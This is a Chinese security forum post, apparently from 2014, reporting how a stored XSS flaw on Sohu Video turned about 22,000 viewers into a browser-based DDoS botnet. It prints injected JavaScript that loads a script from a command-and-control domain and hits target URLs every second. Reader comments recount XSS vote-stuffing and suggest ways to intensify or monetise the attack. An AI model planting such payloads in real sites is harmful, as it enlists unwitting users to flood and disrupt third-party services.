SOHU视频XSS漏洞导致其用户成为DDOS肉鸡，22000用户发了2000万GET请求

from: One of World’s Largest Websites Hacked: Turns Visitors into “DDoS Zombies”

incapsula发现其一个客户遭受了应用层的DDos攻击。

大概有22000的互联网用户对其网站发起了2000万的GET请求。

该攻击是利用的一个持久性XSS，通过找到一个访问量很大网站的xss，在其网站上插入一段js代码，当其用户访问网站之后，就可以利用该网站的用户对其受害者发起攻击。

一个持久性XSS

几种示例代码：

// JavaScript Injection in <img> tag enabled by Persistent XSS
<img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" />

// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
$("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); }

// Ajax DDoS tool in executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg');
function ddos(url,url2){
  window.setInterval(function (){
    $.getScript(url);
    $.getScript(url2);
      },1000)
}
</script>
</body></html>

这种攻击方式在找到访问量巨大的视频网站的xss之后，非常好用，因为一般的视频时间不短，这样访问者在访问视频网站观看视频的时间段内，就不知不觉的成为攻击者的工具对其受害者网站不断的发送请求。

此次被利用的是sohu视频，全球网站流量排名27，可在视频区域插入xss代码，控制观看该视频的用户对受害者不断的发送请求。

注：攻击的效果就是每秒都请求一次url和url2指定的连接，如果一段视频30分钟，那么每个用户都能在看视频这段时间内向两个目标分别发出 1800 次无意义的攻击请求（如cc），如果是成千上万的人看个热门视频的话。。。

[原文地址]

相关内容：

jeary ((:‮？办么怎，了多越来越法方象抽的我)) | 2014-04-30 14:53

昵称 (</textarea>'"><script src) | 2014-04-30 14:54

撸主亮了

核攻击 (统治全球，奴役全人类！毁灭任何胆敢阻拦的有机生物！) | 2014-04-30 14:55

赞一个！

x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么？) | 2014-04-30 15:00

思路不错

疯狗 (你在乌云这么叼，你家人知道么？) | 2014-04-30 15:04

以前有个同事用视频和门户站的评论XSS漏洞刷过票，效果超好根本都停！不！下！来！

（当然是比较次的投票，GET型的，最后网站巨慢无奈给评论刷到第二页，但仍然有流量，最后票数太离谱了。。。）

有大量并源源不断的“攻击源”参与进来，而且访问都真实。。。

rayh4c | 2014-04-30 15:06

用HTML5加个多线程吧，不过有时候会被卡死。

ppt (maodun.github.io)‮(|nuf rof gnikcah|) | 2014-04-30 15:07

思路不错，不知道d的谁

疯狗 (你在乌云这么叼，你家人知道么？) | 2014-04-30 15:22

@rayh4c 你这是恨之入骨模式

李旭敏 ((҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉) | 2014-04-30 15:29

如果发出这样的请求，网速肯定会有影响把？

为什么没有杀软察觉到？

10#

7dscan | 2014-04-30 15:34

干referer?

11#

0x_Jin (世上人多心不齐) | 2014-04-30 15:37

@李旭敏这为什么会被查? 难不成get请求都不能发了？加载一个图片就是发get 如果你要拦截get 那图片都无法加载了

12#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-04-30 15:38

@李旭敏杀软不认为这些HTTP请求是异常的 ._.

13#

疯狗 (你在乌云这么叼，你家人知道么？) | 2014-04-30 15:47

@李旭敏 @超威蓝猫嗯，而且很多网站（比如微博私信、比特币行情）也会定时发送ajax请求获取最新数据，频率也不低，都是正常的请求。

14#

xsser (十根阳具有长短!!) | 2014-04-30 15:53

xss也应该按照影响来分

15#

insight-labs (Root Yourself in Success) | 2014-04-30 18:22

之前朋友的站被用这种方法D，我找了个高带宽服务器加了个varnish做反向代理扛过去了。

16#

mramydnei | 2014-04-30 18:25

@insight-labs　哈哈

17#

伪装 (求基友。加我QQ送Qb！sa@0day.so) | 2014-04-30 20:59

换成广告弹窗,一个广告弹出来了多少次就换下一个,放广告的机器用高防的.暴利阿..

18#

0749orz (一头人，牵着一头牛！) | 2014-04-30 21:19

D，电信服务器去！北京总部！

19#

Levine | 2014-04-30 22:14

http://wooyun.org/bugs/wooyun-2014-054174 大家好我来了

20#

草榴社区 | 2014-04-30 23:53

@疯狗这个.我也用过...确实爽.尤其是验证IP,没有验证码的.

21#

最热微博 (我的钢笔是黑的!) | 2014-05-01 02:10

赞一个！

22#

紫衣大侠 | 2014-05-09 10:30

略屌~

23#

我是一只小毛驴 | 2014-05-09 10:53

为毛我不能发主题的贴子，@xsser @肉肉

24#

浅兮 (初中生) | 2014-05-09 12:36

这篇文章不错！

25#

LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+) | 2014-05-09 18:28

那应该叫 cc攻击，不叫DDOS

26#

Mujj (Krypt VPS特价www.80host.com) | 2014-05-09 19:15

@LaiX DDOS全称拒绝服务攻击。

27#

@Mujj 那个你能百度一下我说的CC攻击吗

28#

px1624 (aaaaaaaaa) | 2014-05-09 20:21

这个漏洞貌似我提交过 2013-08-11 http://wooyun.org/bugs/wooyun-2013-034003

29#

Mujj (Krypt VPS特价www.80host.com) | 2014-05-09 21:29

@LaiX 呵呵